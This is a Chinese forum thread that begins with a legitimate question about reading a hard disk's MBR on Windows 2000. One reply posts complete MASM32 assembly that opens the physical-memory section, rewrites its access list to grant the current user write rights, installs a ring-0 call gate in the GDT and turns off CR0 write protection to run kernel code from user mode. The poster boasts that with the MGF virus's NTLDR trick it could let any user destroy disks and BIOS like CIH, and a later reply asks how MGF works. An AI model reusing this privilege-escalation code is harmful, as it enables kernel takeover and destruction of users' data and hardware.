在WIN2000下如何自己写程序访问硬盘的 “MBR”？

我想写一个硬盘的分区程序，但我不清楚windows 2000本身的 "API"中有没有提供直接访问硬盘的接口。如果没有该怎么做？
谢谢高手的指点。

以管理员身份登录.
CreateFile(""\\\\.\\PHYSICALDRIVEx"...)
x是物理驱动器号.

如果是在非管理员权限下有办法让CreateFile(\"\"\\\\.\\PHYSICALDRIVEx\"...)执行成功吗？

不行
.686p
.model flat, stdcall
option casemap :none   ; case sensitive
; #########################################################################
include \\masm32\\include\\windows.inc
include \\masm32\\include\\user32.inc
include \\masm32\\include\\kernel32.inc
include \\masm32\\include\\advapi32.inc
      
includelib \\masm32\\lib\\user32.lib
includelib \\masm32\\lib\\kernel32.lib
includelib \\masm32\\lib\\advapi32.lib
DEBUG = TRUE

HMODULE typedef dword
NTSTATUS typedef dword
PACL typedef dword
PSECURITY_DESCRIPTOR typedef dword

OBJ_INHERIT=2
OBJ_PERMANENT=10h
OBJ_EXCLUSIVE=20h
OBJ_CASE_INSENSITIVE=40h
OBJ_OPENIF=80h
OBJ_OPENLINK =100h
OBJ_KERNEL_HANDLE=200
OBJ_VALID_ATTRIBUTES=3F2h

SE_KERNEL_OBJECT = 6
GRANT_ACCESS =1
NO_INHERITANCE =0
TRUSTEE_IS_NAME=1
TRUSTEE_IS_USER=1
STATUS_SUCCESS =0
STATUS_ACCESS_DENIED =0C0000022h

STATUS_ACCESS_VIOLATION equ 0C0000005h
STATUS_INFO_LENGTH_MISMATCH equ 0C0000004h
SystemModuleInformation               equ 11
PVOID  TYPEDEF DWORD
UNLONG TYPEDEF DWORD
CHAR   TYPEDEF BYTE

UNICODE_STRING struct
   nLength word ?
   MaximumLength word ?
   Buffer dword ?
UNICODE_STRING ends

OBJECT_ATTRIBUTES struct
   nLength dword ?
   RootDirectory HANDLE ?
   ObjectName dword ?;PUNICODE_STRING  
   Attributes dword ?;
   SecurityDescriptor dword ?; PVOID // Points to type SECURITY_DESCRIPTOR
   SecurityQualityOfService dword ?;PVOID  // Points to type SECURITY_QUALITY_OF_SERVICE
OBJECT_ATTRIBUTES ends


TRUSTEE struct
    pMultipleTrustee dword ?;PTRUSTEE                    
    MultipleTrusteeOperation dword ?; MULTIPLE_TRUSTEE_OPERATION  
    TrusteeForm dword ?;TRUSTEE_FORM
    TrusteeType dword ?;TRUSTEE_TYPE                
    ptstrName dword ?;LPTSTR                      
TRUSTEE ends


EXPLICIT_ACCESS  struct
    grfAccessPermissions DWORD   ?    
    grfAccessMode  dword ? ;ACCESS_MODE
    grfInheritance DWORD ?       ;
    Trustee TRUSTEE  <>    ;
EXPLICIT_ACCESS ends

MyGATE     struct    ;门结构类型定义
    OFFSETL  WORD      ?  ;32位偏移的低16位
    SELECTOR WORd      ?  ;选择子
    DCOUNT   BYTE      ?  ;双字计数字段
    GTYPE    BYTE      ?  ;类型
    OFFSETH  WORD     ?  ;32位偏移的高16位
MyGATE     ends

SetPhyscialMemorySectionCanBeWrited proto :dword
MiniMmGetPhysicalAddress proto :dword

ENTERRING0 macro
pushad  
pushfd
cli
mov eax,cr0   ;get rid off readonly protect
and eax,0fffeffffh
mov cr0,eax
endm

LEAVERING0 macro
mov eax,cr0 ;restore readonly protect
or eax,10000h
mov cr0,eax
sti
popfd
popad  
retf
endm


UNICODE_STR macro str
irpc _c,<str>
db \'&_c\'
db 0
endm
endm

.data?
GdtLimit dw ?
GdtAddr dd ?

mapAddr dd ?
OldEsp dd ?

readed  dw ?
buffer db 512 dup(?)
ShowText db 512*3 dup (?)

.data
align 4
objname dw objnamestr_size,objnamestr_size+2
objnameptr dd 0
objnamestr equ this byte
UNICODE_STR <\\Device\\PhysicalMemory>
objnamestr_size equ $-objnamestr

align 4
ObjAttr db 24 dup (0)
IsIdtFlag dd 0
Callgt dq 0        ;call gate\'s sel:off
Caption db \'Windows XP绝对磁盘读写--MBR\',0
Digit db \'0123456789ABCDEF\',0
.code
_Ring0Proc PROC    ; Ring0 code here..
ENTERRING0
mov dx,1f6h  ;Drive and head port
        mov al,0a0h  ;Drive 0,Head 0
        out dx,al

        mov dx,1f2h  ;Sector count port
        mov al,1     ;Read One Sector
        out dx,al

        mov dx,1f3h  ;Sector number port
        mov al,1     ;Read One Sector
        out dx,al

        mov dx,1f4h  ;Cylinder low port
        xor al,al    ;Cylinder 0
        out dx,al

        mov dx,1f5h  ;Cylinder high port
        xor al,al    ;The rest of Cylinder 0
        out dx,al
 
        mov dx,1f7h  ;Command port
        mov al,20h   ;Read with Entry
        out dx,al
Still_going:
        in al,dx
        test al,8   ;This means the sector buffer requires servcing
        jz Still_going;do not continue until the sector buffer is ready
        xor ecx,ecx
mov cx,512/2  ;one sector/2
        mov edi,offset buffer
        mov dx,1f0h   ;data port - data comes in and out here
        cli
        cld
        rep insw
        sti
LEAVERING0
_Ring0Proc ENDP
Ring0CodeLen=$-_Ring0Proc
_ShowBuffer proc ;显示所读出的信息
;把数据转换成16进制的形式
mov  [readed],512
mov  esi,offset buffer ;数据
mov  edi,offset ShowText ;转换后的数据
mov  ebx,offset Digit
xor  ecx,ecx
xor  eax,eax
computeAgain:
cmp  [readed],0
jz   endCompute
dec  [readed]
lodsb
push eax
shr  eax,4 ;高4位
xlatb
stosb
pop  eax
and  eax,0fH ;低4位
xlatb
stosb
mov  byte ptr[edi],\' \' ;空格
inc  edi
inc  ecx
cmp  ecx,16
jnz  computeAgain
xor  ecx,ecx
mov  byte ptr[edi-1],13 ;回车
jmp  computeAgain
endCompute:
;显示
invoke  MessageBoxA,NULL,offset ShowText,offset Caption,MB_OK
ret
_ShowBuffer endp

SetPhyscialMemorySectionCanBeWrited proc uses ebx esi edi hSection:HANDLE
local pDacl: PACL
local pNewDacl:PACL
local pSD :PSECURITY_DESCRIPTOR
local dwRes:DWORD ;
local ea:EXPLICIT_ACCESS ;
invoke GetSecurityInfo,hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,\\
                  NULL,NULL, addr pDacl,NULL, addr pSD
cmp eax,ERROR_SUCCESS
jz @f
jmp OutSet
@@:
mov dwRes,eax
mov ea.grfAccessPermissions ,SECTION_MAP_WRITE;2
mov ea.grfAccessMode ,GRANT_ACCESS;1
mov ea.grfInheritance,NO_INHERITANCE;0
mov ea.Trustee.pMultipleTrustee,0
mov ea.Trustee.MultipleTrusteeOperation,0
mov ea.Trustee.TrusteeForm,TRUSTEE_IS_NAME;1
mov ea.Trustee.TrusteeType,TRUSTEE_IS_USER;1
call @f
db \"CURRENT_USER\",0
@@:
pop edx
mov ea.Trustee.ptstrName,edx
invoke SetEntriesInAcl,1,addr ea,pDacl,addr pNewDacl
cmp eax,ERROR_SUCCESS
jz @f
jmp OutSet
@@:
invoke SetSecurityInfo,hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,\\
                  NULL,NULL,pNewDacl,NULL
OutSet:
cmp pSD,0
jz @f
invoke LocalFree,pSD
@@:
cmp pNewDacl,0
jz @f
invoke LocalFree,pNewDacl
@@:
ret
SetPhyscialMemorySectionCanBeWrited endp

MiniMmGetPhysicalAddress proc virtualaddress:dword
 mov eax,virtualaddress
 cmp eax,80000000h
 jb @f
 cmp eax,0a0000000h
 jae @f
 and eax,1FFFF000h
 ret
 @@:
 mov eax,0
 ret
MiniMmGetPhysicalAddress endp

ExecRing0Proc proc Entry:ULONG,seglen:ULONG
local tmpSel:dword
local setcg:dword
local BaseAddress:dword
local NtdllMod :dword
local hSection:HANDLE
local status:NTSTATUS
local objectAttributes:OBJECT_ATTRIBUTES  
local objName:UNICODE_STRING
mov status,STATUS_SUCCESS;
sgdt GdtLimit
invoke MiniMmGetPhysicalAddress,GdtAddr
mov mapAddr,eax
test eax,eax
jz Exit1
call @f
db \"Ntdll.dll\",0
@@:
call LoadLibraryA
mov NtdllMod,eax

lea edx,objnamestr
mov objnameptr,edx
lea edi,ObjAttr
and di,0fffch ;align to 4 bytes,or ZwOpenSection will fail
push edi   ;edi->ObjAttr
push 24    ;length of <\\Device\\PhysicalMemory>
pop ecx
push ecx
xor eax,eax
rep stosb   ;put ObjAttr with 0
pop ecx
pop edi
mov esi,edi
stosd
mov dword ptr[esi],ecx
stosd
lea eax,[edx-8] ;eax->objname
stosd      ;ObjAddr(18h,00,00,00,00,00,00,00,offset objname,40,02,00,00,dd 2 dup(0)
mov dword ptr [edi],240h

call @f
db \"ZwOpenSection\",0
@@:
push NtdllMod
call GetProcAddress
mov ebx,eax ;ebx=ZwOpenSection

push esi ;esi->ObjAttr
push SECTION_MAP_READ or SECTION_MAP_WRITE
lea edi,hSection
push edi ;edi->hSection
call eax ;ZwOpenSection(&hSection,SECTION_MAP_READ or SECTION_MAP_WRITE,ObjAttr)

mov status,eax
cmp status,STATUS_ACCESS_DENIED
jnz AccessPermit
mov eax,ebx

push esi
push READ_CONTROL or WRITE_DAC
push edi
call eax

mov status,eax
invoke SetPhyscialMemorySectionCanBeWrited,hSection

call @f
db \"ZwClose\",0
@@:
push NtdllMod
call GetProcAddress

push hSection
call eax  ;zwClose hSection

mov eax,ebx

push esi
push SECTION_MAP_READ or SECTION_MAP_WRITE
lea edi,hSection
push edi
call eax
mov status ,eax
;status =ZwOpenSection(&hSection,SECTION_MAP_WRITE|SECTION_MAP_WRITE,&objectAttributes);
AccessPermit:
cmp status ,STATUS_SUCCESS
jz @f
;printf(\"Error Open PhysicalMemory Section Object,Status:%08X\\n\",status);
;return 0;
mov eax,0
ret
@@:
movzx eax,word ptr[GdtLimit]
inc eax
invoke MapViewOfFile,hSection, FILE_MAP_READ or FILE_MAP_WRITE, 0, mapAddr, \\
                     eax
mov BaseAddress,eax
cmp BaseAddress,0
jnz @f
;printf(\"Error MapViewOfFile:\");
;PrintWin32Error(GetLastError()); return 0;
mov eax,0
ret
@@:
mov    esi,eax ;esi->gdt base
movzx  eax,word  ptr GdtLimit   ;eax=gdt limit
mov IsIdtFlag,0
call    Search_XDT
mov tmpSel,eax
mov setcg,FALSE;
mov esi,BaseAddress
mov ebx,eax
add ebx,esi
assume ebx:ptr MyGATE
mov edx,Entry
mov [ebx].OFFSETL,dx
mov [ebx].SELECTOR ,8
mov [ebx].DCOUNT ,0
mov [ebx].GTYPE,0ech
shr edx,16
mov [ebx].OFFSETH,dx
mov setcg,TRUE
cmp setcg,0
jnz ChangeOK
call @f
db \"ZwClose\",0
@@:
push NtdllMod
call GetProcAddress
push hSection
call eax
xor eax,eax
ret
ChangeOK:
and    dword ptr Callgt,0
or     al,3h
mov    word  ptr [Callgt+4],ax  
;farcall[2]=((short)((ULONG)cg-(ULONG)BaseAddress))|3; //Ring 3 callgate;

invoke VirtualLock,Entry,seglen
test eax,eax
jnz @f
xor eax,eax
ret
@@:
invoke GetCurrentThread
invoke SetThreadPriority,eax,THREAD_PRIORITY_TIME_CRITICAL

invoke Sleep,0
call    fword ptr [Callgt]            ;use callgate to Ring0!
;_asm call fword ptr [farcall]
invoke GetCurrentThread
invoke SetThreadPriority,eax,THREAD_PRIORITY_NORMAL

invoke VirtualUnlock,Entry,seglen

;//Clear callgate
;*(ULONG *)cg=0;
;*((ULONG *)cg+1)=0;
mov esi,BaseAddress
mov eax,tmpSel
add eax,esi
mov dword ptr[eax],0
mov dword ptr[eax+4],0
;ZwClose(hSection);
call @f
db \"ZwClose\",0
@@:
push NtdllMod
call GetProcAddress
push hSection
call eax
mov eax,TRUE
ret
ExecRing0Proc endp

Search_XDT proc near      ;entry esi==Base  of Idt  or GDT
                          ;Eax==Limit
    pushad      
    mov ebx,eax            ;ebx=limit
    mov eax,8        ; skipping null selector
@@1:        
    cmp IsIdtFlag,1
    jz  IsIdt
    cmp dword ptr [esi+eax+0],0 ;gdt  
    jnz @@2
    cmp dword ptr [esi+eax+4],0    
    jz @@3
    jmp @@2
IsIdt:
    cmp dword ptr [esi+eax+0],80000h ;idt  
    jnz @@2
    cmp dword ptr [esi+eax+4],0    
    jz @@3  
@@2:        
    add eax,8        
    cmp eax,ebx        
    jb @@1      ;if we haven\'t found any free GDT entry,
                ;lets use the last two entries        
    mov  eax,ebx      
    sub  eax,7          
@@3:      
    mov [esp+4*7],eax      ; return off in eax
    popad                  ; eax=free GDT or IDT entry selector
    ret        
Search_XDT endp

main:
assume fs:nothing
push offset MySEH
push fs:[0]
mov fs:[0],esp
mov OldEsp,esp
mov ax,ds ;if Win9x?
test ax,4
jnz Exit1
invoke VirtualLock,offset _Ring0Proc,Ring0CodeLen
;invoke VirtualLock,offset r0Data,sizeof(RING0DATA)
invoke ExecRing0Proc,offset _Ring0Proc,Ring0CodeLen
;invoke VirtualUnlock,offset r0Data,sizeof(RING0DATA)
invoke VirtualUnlock,offset _Ring0Proc,Ring0CodeLen
call _ShowBuffer
Exit1:
pop fs:[0]
add esp,4
invoke ExitProcess,0

MySEH :
mov esp,OldEsp
pop fs:[0]
add esp,4
invoke ExitProcess,-1
end main
    直接杀入RING0，IO读取MBR，结合MGF病毒的方法，修改NTLDR可以直接在任意用户模式下，杀入RING0读写任意硬盘扇区，修改下也可以超越当年的CIH，在2K/XP/2003下任意破坏硬盘，BIOS等，嘿嘿。。。。。。

不行
.686p
...............（忽略）
4

invoke ExitProcess,-1
end main
    直接杀入RING0，IO读取MBR，结合MGF病毒的方法，修改NTLDR可以直接在任意用户模式下，杀入RING0读写任意硬盘扇区，修改下也可以超越当年的CIH，在2K/XP/2003下任意破坏硬盘，BIOS等，嘿嘿。。。。。。

MGF病毒是什么？没有听说过，能不能介绍一下？另外，这个病毒修改NTLDR后是否需要重新启动才能进入Ring0？（如果需要重新启动，实用性不大）。还有MGF第一次修改NTLDR时是否必须具有管理员权限？